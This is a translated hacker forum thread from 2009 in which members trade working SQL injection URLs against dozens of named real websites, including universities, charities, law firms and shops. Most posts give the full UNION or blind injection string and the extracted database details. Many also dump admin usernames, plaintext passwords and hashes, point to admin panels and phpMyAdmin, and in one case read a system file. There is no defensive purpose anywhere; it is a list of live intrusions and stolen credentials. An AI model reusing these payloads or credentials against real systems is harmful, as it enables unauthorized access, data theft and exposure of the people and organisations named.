
View full version: SQL Injections



HAXTA4OK
08.05.2009, 10:42
PR: 5

http://www.nordic-experts.gr/holarea.php?ID=-1+union+select+1,concat_ws(0x3a,database(),versio n(),u ser()),3--


nexpertsdb:4.0.18:nexperts@localhost

------------------------------------------------------------------------
PR: 6

http://www.notary.ge/index .php?lang=geo&query=regions&id=-1+union+select+concat_ws(0x3a,database (),version(),user())--


notary_main:5.0.67:notary_www@localhost

tables:
regions_table,docs_table,statistics_table,english_ news_table,types_table,journal_table,users_table,n ews_table,backup_table

columns of table users_table:

id,user,password,name,type,reg_date


http://www.notary.ge/index.php?lang=geo&query=regions&id =-1+union+select+concat_ws(0x3a,id,user,pa ssword,name,type,reg_ date)+from+users_table--


1:5895700ee4f895f31ecb409f5e380fe7fb9e2524:f22c93f 486c3c3e7bb219761a452a5f13c23038f:GM Design Support Team:1:2006-01-31 01:13:00

--------------------------------------------------------------------------
http://www.avocat.gr/main-en.php?menu=practice&submenu=practice&id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user())--

ingcom_avocat:4.1.22-max-log:ingcom_avocat@208.109.181.151

------------------------------------------------------------------------
PR: 3

http://www.eurolux.com.gr/news.php?id=-1+union+select+1,2,@@version,4,5--

Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
------------------------------------------------------------------------
PR: 7

http://erasmus.aegean.gr/ects/grad_allcourses.php?id=1+union+select+1,concat_ws( 0x3a,version(),database (),use r()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22--


5.0.51:ects:ectsuser@localhost

HAXTA4OK
08.05.2009, 14:37
PR: 3

http://dmet.iema.gr/index.php?lang=0&id=-1+union+select+1,concat_ws(0x3a,version(),datab ase(),user ()),3,4,5,6,7,8--


5.0.45-Debian_1-log:dmet:iema@localhost

bug1z
08.05.2009, 15:36
A few SQL injections from me:

http://www.swissconfort.es/detail-produit.php?id=-1+union+all+select+0,1,2,3,4,CONCAT_WS(CHAR(32,58, 32),user(),database(),version()),6,7,8,9,10,11,12, 13,14,15--

db info:

swisscon3@localhost : swiss_confort_es : 4.1.19

################################################## #######

http://www.tuesdaymusic.at/gallery.php?id=-1+union+all+select+0,1,CONCAT_WS(CHAR(32,58,32),us er(),database(),version()),3,4,5--

db info:

web27@localhost : usr_web27_1 : 5.0.32-Debian_7etch6-log

################################################## ######

http://www.fondazionemondadori.it/electa/volume.php?item_id=-1+union+all+select+0,1,2,3,4,CONVERT(CONCAT_WS(CHA R(32,58,32),user(),database(),version())%20USING%2 0latin1),6,7,8,9,10,11,12,13--

db info:

fm_ele@10.10.0.11 : fondmond_electa : 4.1.10-log

################################################## ######

http://www.comitel.it/EN/newsdetail.php?id=-1+union+all+select+0,1,2,3,CONCAT_WS(CHAR(32,58,32 ),user(),database(),version()),5,6,7,8,9,10--

db info:

cominfjv@localhost : cominfjv_comitel : 4.1.22-standard

################################################## #######

http://www.vipers.mi.it/news.php?id=-1+union+all+select+0,CONCAT_WS(CHAR(32,58,32),user (),database(),version()),2,3,4--

db info:

103vipers@10.50.33.60 : vipersdb : 4.0.16-log

################################################## #####

HAXTA4OK
08.05.2009, 16:02
http://www.klooun-maroulis.gr/default.php?id=-1'+union+select+1,2,@@version,4,5,6,7/*&lang=en

5.0.45


################################################## #
PR: 2

http://soundgeist.gr/index.php?page=article&id=-1+uni on+select+1,2,concat_ws(0x3a,version( ),database(),user()),4--

4.1.13:soundgeist:soundgeist@localhost

Kimliksiz
08.05.2009, 16:41
http://cards.ekalaiya.com/getnewsitem.php?newsid=1+union+select+1,2,concat(u sername,char(45),userpass),4,5+FROM+gc_cardusers--

arun-f24262fc9b726081efce5c1fbebcd71c ??*

http://cards.ekalaiya.com/login.php

HAXTA4OK
08.05.2009, 17:00
PR: 3

http://www.hotelstanley.eunet.gr/index.php?user=page&id=-1+union+select+version()--


tables:
bookingaff,virtual_pictures,payment,additional_ser vice_pro,sent_documents,affiliatesclicks,textbanne r,multiplelanguage,r_stages_status,extra_amenities ,weeks,seo_values,invoiced_bids,clients,photo,conf igure,booking_location_temp,v43_valuegroups,number ofdays2,additional_service_booking,rooms,importedd ata,taxe,months,r_bid_actions,document_categories, bookingweeks_temp,bid_xlink,v43_groups,nb_of_prope rties_agent,realestate_additional_values,halfdaysn ame,specialweeks,lastminute_frontend2,a_inv_bids,p rospectiveresponses,deposit,bookingmonths,apropert ies,v43_booking_enquiry_results,n_groups,specialda ys,language,a_agentsettings,ratecard_rates2,files, properties_extra_amenities,days,bookingaff_temp,vt url,perioaddays,admin,affiliatespayment,tour_opera tors,mysqlservers,ratecard_month_intervals,extra_a menities_categories,years,shoppingcart,invoices,cl ients_orders,photo_multiple,configuremultiple,book ing_registry,v43_valuegroupsitems,numberofweeks,ad ditional_service_booking_temp,searchorder,inbox,af filiates,taxes,more_type

admins:
http://www.hotelstanley.eunet.gr/in dex.php?user=page&id=-1+union+select+group_concat(concat_ws(0x3a,user ,password))+from+admin--



Gorev
08.05.2009, 17:20
http://www.pragaviaggi.it/?p=dettaglioPacchetto&idp=-585+union+select+1,2,3,concat_ws(0x3a,@@version_co mpile_os,version(),database(),user()),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20

Os : pc-linux-gnu
Database Version: 4.1.22-standard
Database name: pragavia_pragaviaggi
User name: pragavia_pragau@localhost

HAXTA4OK
08.05.2009, 18:44
PR: 3

http://www.ritzacapulco.com.mx/ver.php?lang=en&s=gr&id=1+union+select+1,concat_ws(0x3a,version(),data base(),use r()),3,4/*

4.1.22-standard-log:ritzaca_web:ritzaca_admin@web5.onnetsecure.net

Gorev
08.05.2009, 18:53
PR 8
http://www.coe.ro/stire.php?id=772+AND+(SUBSTRING((version()),1,1))= 3/*

Version : 3.23.58
User : coe@localhost
Database : coe

HAXTA4OK
08.05.2009, 19:43
PR: 4

http://www.travelway.gr/pa ges/en/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6,7--& cmd=read

4.0.16-standard-log:travelway:travelway@10.40.5.16

Gorev
08.05.2009, 20:03
http://www.reintregirea.ro/index.php?cid=stire-1228+union+select+1,2,concat_ws(0x3a,@@version_com pile_os,version(),database(),user()),4,5,6,7+limit +1,1

Database Version: 5.0.32-Debian_7etch8-log
Database name: biserica
User name: usrbbsir@localhost
Os : pc-linux-gnu

mailbrush
08.05.2009, 21:14
http://www.tradeunionsdunit.org/profiles/profiles.php?ID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2/*TUAC@localhost:tuac:4.1.13-nt

http://www.danishww2pilots.dk/articles.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8danishww2pilots@srv54.one.co m:danishww2pilots:5.0.32-Debian_7etch10-log

Skofield
08.05.2009, 21:24
http://www.remsoft.ca {PR 5}
http://www.remsoft.ca/news.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*

4.1.22-community-nt-log : remsoft : remsoft@WSH-004

L I G A
08.05.2009, 22:00
http://macinplay.de
http://macinplay.de/ViewReview.php?id=-342+union+select+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6--
version():5.0.32-Debian_7etch1~bpo.1-log
database():macinplay_de
user():ftp49963@localhost
os:pc-linux-gnu: 2

tables:
http://macinplay.de/ViewReview.php?id=-342+union+select+1,2,table_name,4,5,6+from+informa tion_schema.tables--

Skofield
08.05.2009, 22:09
http://www.parkinsonalliance.org {PR 6}
http://www.parkinsonalliance.org/news.php?ID=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11--

5.0.67 : parkinsonalliance_org_-_maindb : parky@localhost

----------------------------------------------------------------------------------------------------

http://www.theciel.com {PR 5}
http://www.theciel.com/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12--

5.0.51a-3ubuntu5.4 : ciel : ciel@localhost

d1aVOL
08.05.2009, 22:42
http://www.artemismusic.com/page.php?id=-1+union+select+1--
4.1.22-standard-log
artemismusic@192.168.0.7

Skofield
08.05.2009, 22:54
http://www.ftlauderdalenews.net {PR 3}
http://www.ftlauderdalenews.net/news.php?id=-140+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7,8--

4.1.20-max-log : Promena_news : Promena_pubuser@76.162.254.225

tabla users:
http://www.ftlauderdalenews.net/news.php?id=-140+union+select+1,2,3,concat_ws(0x3a,name,passwor d),5,6,7,8+from+users--

Ray Brasted : 1x2y3z

--------------------------------------------------------------------------------------------------------------------------------

http://www.omnisens.ch {PR 5}
http://www.omnisens.ch/ditest/doc-news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14/*

4.1.22-log : db1034902 : user10349@web03

--------------------------------------------------------------------------------------------------------------------------------

http://www.nnpn.org {PR 5}
http://www.nnpn.org/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5/*

4.1.22-max-log : nnpn : nnpn@97.74.144.114

mailbrush
09.05.2009, 00:48
http://www.hlg.edu/common/profiles/profiles.php?id=-1+union+select+1,2,3,4,5,6,7,unhex(hex(concat_ws(0 x3a,user(),database(),version()))),9,10,11,12,13,1 4root@localhost:site_pages:5.0.15-nt
http://www.hlg.edu/common/profiles/profiles.php?id=-1+union+select+1,2,3,load_file(0x433A5C626F6F742E6 96E69),5,6,7,8,9,10,11,12,13,14
boot.ini

HAXTA4OK
09.05.2009, 10:20
PR: 4

http://www.wostep.ch/index.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),databa se(),vers ion()),4,5+ --+&lang=en


web193@localhost:usr_web193_1:5.0.45

mailbrush
09.05.2009, 10:47
http://www.riff.it/php/show.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52Sql44172@62.149.130.186:Sql44172_1:4.0.30-standard-log

HAXTA4OK
09.05.2009, 12:46
Happy holiday, guys; well, let's go through the Germans ;)

http://carnageclan.de/download_info.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10,11,12,13,14/*

v099182@localhost:v099182:4.1.21-max-log


there's a forum there :)


P.S. thanks to mailbrush for this site (for getting the info)
################################################## ##########

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user() ,database(),version()),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36--

web3_bitesser@localhost:web3_bitesser:5.0.26-log 1.1


tables:

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_na me),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27,28,29,30,31,32,33,34,35,36+from+informat ion_schema.tables+group+by+table_schema+limit+1,1--


bit_scri_imp,rel_gs_group_gs_rights,rel_bit_member _bit_scri_imp,bit_tip,rel_tipprechnung_tippposten, rel_bit_news_bit_news_cat,forum_member,bit_job,rel _bit_scri_bit_scri_his,generic_id_tablenames,bit_n ews_sta,rel_bit_tip_bit_tip_cat,gs_rights,gs_user, bit_scri_lan,rel_gs_user_gs_group,rel_bit_member_b it_tip,bit_tip_cat,tippkunde,rel_bit_news

http://www.bitesser.de/freeware/script.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat (column_name),9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+from+information_schema.columns+where+table _name=0x67735f75736572--

generic_id,id,creation_date,creation_time,modify_d ate,modify_time,active,username,password,name,surn ame

(but for some reason it's empty)))

mailbrush
09.05.2009, 12:57
http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,version(),null,null,nul l,null,null,null,null,null,null,null,null,null
POSTGRESQL 7.1.3 ON SPARC-SUN-SOLARIS2.7, COMPILED BY GCC 2.8.1

First time I've encountered PgSQL.

Rubaka
09.05.2009, 14:09
http://www.carolinainnatvg.com/news_detail.php?n_recid=-17+UNION+SELECT+1,2,3,4,5,6,7,8,9

Database Version: 5.0.45-log
Database name: biztools_carolinainn
User name: biztools_127@localhost

http://www.mytimber.net/news_detail.php?newsid=11+UNION+SELECT+1,2,3,4,5,6 ,7,8,9+LIMIT+1,1

Database Version: 4.0.24-log
Database name: uob0q1_db
User name: uob0q1@localhost

farex
09.05.2009, 16:15
sql - blind
<<Distance Learning Center>>
http://www.tsiac.ru/cdo/index.php?id=14+or+ascii(substring(version(),1,1)) =52--+
db: 4.......

..::TROYAN::..
09.05.2009, 17:09
blind-sql:
www.aimp.ru

http://aimp.ru/index.php?do=view&id=5161+and+ascii(lower(substring(user(),2,1)))=10 5

user():aimp
http://aimp.ru/index.php?do=view&id=5161+and+substring(version(),1,1)=4
version():4.... damn, MySQL version 4 doesn't support subqueries((((

InFlame
09.05.2009, 17:37
http://www.derechoshumanos.org.mx/modules.php?name=News&file=article&sid=-301+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14

Only the parentheses are filtered...

InFlame
09.05.2009, 18:24
Target: metrocasas.com.mx

Evil link: http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,2,3,4

Database info (user:version:database):
visiondig@localhost:4.1.21-standard-log:visiondig_metro

Users:
http://metrocasas.com.mx/cliente/paginas/news.php?page=2&id_news=-60+union+select+1,group_concat(login,0x3a,password ),3,4+from+users

F4R
09.05.2009, 19:05
http://www.islam.com.mx/quiz_output.php?quiz_id=2%27/**/union/**/select+1,password,username,4,5,6,7,8,9+from+user/*

login: smontiel
pass: 445339 (thanks to the Google search engine for the pass)

F4R
09.05.2009, 19:30
http://cambiodeluces.arts-history.mx/entrada.php?id=-254+UNION+SELECT+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8--

Database Version: 5.0.45-log
Database name: neoartes
User name: neoartes@localhost

Getting Data from table blog_users from database neoartes
Fields username:email:password

Getting Data from table phpSP_users from database neoartes
Fields user:password

Getting Data from table sre_sp_users from database neoartes
Fields user:password

Skofield
09.05.2009, 20:17
http://www.kvbpr.com {PR 3}
http://www.kvbpr.com/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--

5.0.67-community : kvbpr_kvbpr08 : kvbpr_idesign@localhost

table users:
http://www.kvbpr.com/news.php?id=-1+union+select+1,group_concat(name,0x3a,pass),3,4, 5+from+users--

DrAssault
09.05.2009, 21:53
http://www.technolex-anwaelte.de/index.php?id=43&news_id=1+UNION+SELECT+1,2,concat_ws(0x3a,user(),v ersion(),database()),4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24--

php-info:
http://www.technolex-anwaelte.de/info.php

admin panel:
http://www.technolex-anwaelte.de/admin/

Directory listing:
http://www.technolex-anwaelte.de/admin/index_upload.php?dir=../

Admin panel passwords:
1:technolex:technolex!
2:14v:14v

Rubaka
09.05.2009, 23:53
http://kiteonline.net/pages/news_detail.php?id=-34+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11

Database Version: 5.0.67-community
Database name: kiteonli_dbkite
User name: kiteonli_kitesit@localhost

In database kiteonli_dbkite found table adminusers
1 : firstname
2 : lastname
3 : email
4 : username
5 : password
6 : approval
7 : tbDate
8 : userid

..::TROYAN::..
10.05.2009, 00:07
http://www.stadiya.ru/news/?id=-434+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9--

stadiya_@imarket1.2x4.ru:stadiya_:4.1.22-log

TIC: 100
PR:4

udman
10.05.2009, 00:48
http://www.sim.misto.zp.ua/show.php?id=-746+union+sele ct+concat(u ser(),0x0B,database(),0x0B,version())+--+
mistozpu_misto@localhost
mistozpu_smile
5.0.67-community-log

http://www.sim.misto.zp.ua/show.php?id=-746+union+select+concat(TABLE_NAME,0x0B,COLUMN _NAME)+from+information_schema.columns+lim it+179,10+--+


table: admin
columns: password
only I can't get anything from the admin table, I can't figure out what's going on; if anyone manages to pull it from admin, give me a shout in PM, thanks

Климент_Ворошилов
10.05.2009, 01:16
_http://www.mango-mango.ru/news/index.php?page=single&rec=21
_http://www.mango-mango.ru/news/index.php?page=single&rec=21+order+by+7+--+
_http://www.mango-mango.ru/news/index.php?page=single&rec=-21+union+select+1,2,3,4,5,6,7+--+
_http://www.mango-mango.ru/news/index.php?page=single&rec=-21+union+select+1,version(),database(),4,user(),6, 7+--+

version - 4.1.22-sta
database - mangoman_base
user - mangoman_user@localhost

Tables:
customers
articles
news

F4R
10.05.2009, 10:17
http://www.flashadvisor.com/movie/index.php?viewCat=5+UNION+SELECT+1,2,3,concat_ws(0 x3a,version(),user(),database()),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19--

Database Version: 5.0.67-community-log
Database name: flash_flashadvisor
User name: flash_flash@localhost


Getting Data from table vb_user from database flash_flashadvisor
Fields username:password:email



P.S. the 1st and 5th accounts are admins)
__________________________________________________ _________________

http://elgraficotam.com.mx/noticia.php?id=7518+union+selecT+version(),databas e(),3,user(),5,


version() : 4.1.22-standard
user() : elgrafic_u
database() : elgrafic_bd

..::TROYAN::..
10.05.2009, 10:33
http://www.go2usa.ru/news.php?id=-143+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,version(),database()),8,9--
sunnyart_usa@localhost:4.0.27-standard:sunnyart_usa
PR:2
TIC: 40


http://www.avia-line.ru/news/index.php?id=-23+union+select+concat_ws(0x3a,user(),version(),da tabase())+from+users--&lang=rus
avialin7_pilot@localhost:4.0.27-log:avialin7_avia
http://www.avia-line.ru/news/index.php?id=-23+union+select+concat_ws(0x3a,username,password)+ from+users--&lang=rus
admin1:2d40ebdd5c4dd48caba41846aa81c820fb51e67f
PR:2
TIC: 60

Assembler
10.05.2009, 13:12
http://www.art-legion.com/page.php?id=-1%20union%20select%201,2,concat_ws(0x3a,id,login,p assword,name,email,priv),4,5,6,7,8,9,10%20from%20a legion_admins%20--

1:artmooncat:artsql:superadmin:sam@netservise.ru:0

rushter
10.05.2009, 13:17
http://www.yellowpages.md/news2/news.php?id=-260+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,database(),version()),8,9,10,11,12--
yellowpages@localhost:yellowpages:4.1.22

Gorev
10.05.2009, 14:00
http://www.utcm.md/index.php?action=content&id=-6%27+union+select+1,concat_ws(0x3a,version(),datab ase(),useR(),@@version_compile_os)/*



Database Version: 5.0.27
Database name: utcmmd
User name: utcmmd@localhost
Os : portbld-freebsd6.2

Gorev
10.05.2009, 14:40
http://www.varo-inform.com/main.php?p=u.-1+UNION+SELECT+concat_ws(0x3a,user()%20,database() ,version(),@@version_compile_os),2/*.1.0



Database Version: 4.1.22
Database name: varo_test
User name: varo_test@localhost
Os : pc-linux-gnu

molotovkeyt
10.05.2009, 15:56
TIC: 30, PR: 4
http://www.brigsp.ru/news/news.php?id=-101+union+select+1,2,version(),4,5,6,7--

DezMond™
10.05.2009, 16:53
Edu, PR5
http://art.colorado.edu/hiaff/interview.php?id=47&cid=-3+union+select+1,2,3,4,5,6,7+from+mysql.user/*

rushter
10.05.2009, 17:36
http://www.movingpicturescollective.org/news/news.php?id=-476+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5--
nycfcug2_admin@localhost:nycfcug2_site:5.0.67-community PR5
tables:
http://www.movingpicturescollective.org/news/news.php?id=-476+union+select+1,2,3,TABLE_NAME,5+FROM+INFORMATI ON_SCHEMA.TABLES--
members:
http://www.movingpicturescollective.org/news/news.php?id=-476+union+select+1,2,3,concat_ws(0x3a,user_name,pa ssword),5+FROM+members--

HAXTA4OK
10.05.2009, 18:34
http://www.chernayagora.com/view_page.php?page=-10+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5,6,7,8,9--

4.1.22-log:chernay3_goracom:chernay3_odmin@localhost

Dimionx
10.05.2009, 19:00
www.qpc.edu.pk

http://www.qpc.edu.pk/news.php?id=19+union+select+1,concat_ws(0x3a,versi on(),user(),database()),3,4,5,6,7,8

Version - 5.0.67-community
User - qpcedu_qpcadmin@localhost
DB - qpcedu_qpc

Users table:

http://www.qpc.edu.pk/news.php?id=19+union+select+1,concat_ws(0x3a,user_ name,user_password),3,4,5,6,7,8+from+t_user

rushter
10.05.2009, 21:21
http://www.bungarayanews.com/news.php?id=-232+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9,10--
bungaraya_admin@localhost:bungaraya_db:5.0.45-community-log
http://www.getawaytur.dp.ua/view_page.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5--
getawaytur_admin@localhost:getawaytur_db:5.0.22
http://www.notacop.com/user/view_page.php?id=-7622+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,u ser(),database(),version()),10--
root@localhost:scam_spider_test:5.0.41-community-nt

DezMond™
10.05.2009, 21:33
More edu
http://chick.cis.udel.edu/reactome_v3/update.php?ID=-373867+union+select+1,2,column_name,4,5+from+infor mation_schema.columns/*&PATH=71406&R=2

Skofield
10.05.2009, 22:18
http://www.cascadeaids.org {PR 5}
http://www.cascadeaids.org/page.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*

5.0.27-max-log : cap: cap@localhost

tables:
http://www.cascadeaids.org/page.php?id=-1+union+select+group_concat(table_name)+from+infor mation_schema.tables/*

..::TROYAN::..
10.05.2009, 22:19
http://www.1arenda.ru/flat.php?idflat=-152+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36--
dbu_ooospark_1@192.168.8.82:db_ooospark_1:4.1.22
PR:4
TIC: 200

DrAssault
10.05.2009, 22:39
http://www.videofil.net.ua/prices.php?id=-1+union+select+1,2,concat_ws(0x3a,id,login,passwor d),4,5,6,7,8+from+users+--+
1:admin:b4d5caaf5ef14f659142515d1d7fe0a9

Gorev
10.05.2009, 23:04
http://www.catsmd.com/index.php?lang=ru&lnk=pomet.php?-4+union+select+1,2,3,concat_ws(0x3a,version(),data base(),useR(),@@version_compile_os),5,6,7,8,9,10,1 1,12,13,14,15,16--


Database Version: 5.1.32
Database name: catsmdc_cats
User name: catsmdc_root@localhost
Os : portbld-freebsd7.0

Skofield
11.05.2009, 00:08
http://www.academianavigatio.org {PR 2}
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15--

5.0.75-log : anavigatio : anavigatio@85.128.177.64

columns where table name user:
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,group_concat(column_name),3,4,5,6 ,7,8,9,10,11,12,13,14,15+from+information_schema.c olumns+where+table_name=0x75736572--

id,login,haslo,imie,nazwisko,data_utworzenia,prawo

columns info where table name user:
http://www.academianavigatio.org/angielski/projects_more.php?id=-1+union+select+1,concat_ws(0x3a,id,login,haslo,imi e,nazwisko,data_utworzenia,prawo),3,4,5,6,7,8,9,10 ,11,12,13,14,15+from+user--

1 : an : qwer1234 : ADMIN : ADMIN: 0000-00-00 : 1

dr.Pilulkin
11.05.2009, 09:01
http://shop.solarstone.co.uk/products.php?cat_id=-37+union+select+1,2,3,4,5,group_concat(concat_ws(0 x3a,email,passwd))+from+solarsto_shop.customers--

http://baltija.eu/news_print.php?ntpl=2&print_id=-600+union+select+concat_ws(0x3a,version(),database (),user()),2,3,4,5,6,7,8--

4.1.22-standard:gjdrp_portal:gjdrp_portal@localhost

http://baltija.eu/news_print.php?ntpl=2&print_id=-600+union+select+group_concat(concat_ws(0x3a,login ,pass)),2,3,4,5,6,7,8+from+users--



http://www.abdn.ac.uk/r&i/support/print.php?id=-75+union+select+1,version(),3,4,5,6,7,8,database() ,10,11,12,user(),14--

woi001_fund@webserv2-7.abdn.ac.uk
5.0.37-community-log
woi001_fund


http://www.articlesfree.co.uk/article.php?id=-24789+union+select+1,2,3,4,user(),database(),versi on(),8,9,10,11,12,13,14,15,16,17--&act=print

ukart01_adrian@localhost
5.0.67-community
ukart01_ukart

http://www.articlesfree.co.uk/article.php?id=-24789+union+select+1,2,3,4,group_concat(concat_ws( 0x3a,adminid,password)),6,7,8,9,10,11,12,13,14,15, 16,17+from+dbs_admin--&act=print

admin:6ecef1648de55c0ad4e1dbc87116ea6c

HAXTA4OK
11.05.2009, 10:05
PR: 3

http://www.classic-zone.de/modding.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user ())--

4.1.22-max-log:v128336:v128336@localhost

########################################

http://www.admintalk.de/viewtips.php?id= 1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21--

5.0.32-Debian_7etch10-log:admintalk:Jann@localhost

a bunch of tables, I'll post a piece:

http://www.admintalk.de/viewtips.php?id=1+union+select+1,group_concat(tabl e_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21+from+information_schema.tables+group+by+ta ble_schema+limit+2,1--

atalk_tips,atalk_programme_os,atalk_programme_imag es,pot_user_agents,pot_hostnames,pot_accesslog,ata lk_programme_subcategory,atalk_programme_language, pot_visitors,atalk_bezug_os,pot_operating_systems, pot_add_data,atalk_statistics_referrer,atalk_progr amme_licence,atalk_bezug_sprache,pot_referers,pot_ documents,atalk_system_users,atalk_progra

(view all the tables via limit)

took the table atalk_system_users:

http://www.admintalk.de/viewtips.php?id=1+union+select+1,group_concat(conc at_ws(0x3a,name,username,email,password)),3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+ata lk_system_users--



P.S. some of the hashes are in the DB at http://passcracking.ru/index.php so go ahead, only I couldn't connect to the admin panel ))

InFlame
11.05.2009, 10:56
www.khatece.com Kharkiv Theatre Center

http://www.khatece.com/html/press/news/new.php?id=-28+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7
5.0.67-community-log::new2002_new2002@localhost::new2002_theatre

Tables:
http://www.khatece.com/html/press/news/new.php?id=-28+union+select+1,2,group_concat(table_name),4,5,6 ,7+from+information_schema.tables+group+by+table_s chema+limit+1,1
smi,comments,nick_base,photografs,theatres,News,da te_indexing,number,photos,places,bill_projects,fin d_wo,partners,projects,category,guestbook,photo_bi ll

dr.Pilulkin
11.05.2009, 11:15
http://www.britisharticledirectory.co.uk/article.php?id=-545+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,1 3,14,15,16,17--&act=print
4.1.22-standard:britisha_ad:britisha_ad@localhost

http://www.clubgb.co.uk/darts/teams/player-stats-print.php?ID=18&ID2=43&ID3=0&ID1=-33+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versi on(),database(),user()),9,10,11,12,13,14,15,16,17--
4.1.21-standard:clubgb:axol@195.224.50.61

HAXTA4OK
11.05.2009, 11:36
TIC: 10
PR: 4

http://www.levgroup.am/rus/index.php?sec=photo&id=-1+union+sel ect+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7--

5.0.67-community-log:levgroup_db:levgroup_db@localhost

tables: photo,home,photo_parent,images,about,users,news,ap load_images,other,create_photo

columns-users:

id,username,password,lastname,firstname,email

admin: 1:AL31d4H7:0562a1064bd7a70ffe5e5b6934e2c627 :(??

##########################################
PR: 4

http://www.parle.am/index.php? p=7&l=arm&s=3&id=-1+union+select+1, concat_ws(0x3a,version(),data base(),user()),3,4,5--

5.0.67-community:parleam_db:parleam_user@localhost

tables:catalogue,groups,category,pprice,content,pr inting,gallery,struct,ggroups

DezMond™
11.05.2009, 13:44
University of Zimbabwe))
http://www.uz.ac.zw/jobs/details.php?id=-385+union+select+1,2,3,4,5,6,table_name,8+from+inf ormation_schema.tables+limit+145,1000--

work_student
userinfo_def
userinfo_content
lp_user_module_progress
group_rel_team_user
bb_users
bb_rel_topic_userstonotify
user_sessions

Skofield
11.05.2009, 17:27
http://www.emsa2008.org {PR 3}
http://www.emsa2008.org/index.php?id=-1+union+all+select+1,2,concat_ws(0x3a,version(),da tabase(),user()),4,5,6--

5.0.51a-24 : emsa2008 : emsa2008@localhost

http://www.emsa2008.org/index.php?id=-1+union+all+select+1,2,group_concat(login,0x3a,pas s),4,5,6+from+users--

login : emsa2008
pass : cemsa2008fpm

http://www.emsa2008.org/phpmyadmin

DezMond™
11.05.2009, 19:55
http://www.aioug.org/eventdetails.php?id=-5+union+select+1,group_concat(uname,char(58),pass, char(58),level,char(58),web

site),3,4,5,6,7,8,9,10,11,12+from+users--


DezMond™
11.05.2009, 20:50
http://www.braintumorfoundation.org/eventdetails.php?ID=-11+union+select+1,table_name,3,4,5+from+informatio n_schema.tables+limit+16,100+--+

btfforum1101,cont,events,faq,forumbu,forumbu2,foru mbu3,news,pstory,btfforum1101,cont,events,faq,foru mbu,

http://capla.arizona.edu/events/eventdetails.php?id=-66+union+select+1,2,3,group_concat(column_name),5, 6,7,8,9,10+from+information_schema.columns+where+t able_name=0x7573657273+/*+

Kimliksiz
11.05.2009, 22:42
http://www.sindadvogados-rj.com.br/SuperNews/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--


admin

--------------------------------------------------------------------------------

00/00/0000 - 00h00min

--------------------------------------------------------------------------------


http://www.diamantinaonline.com.br/anterior/noticias/valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--


donline

--------------------------------------------------------------------------------

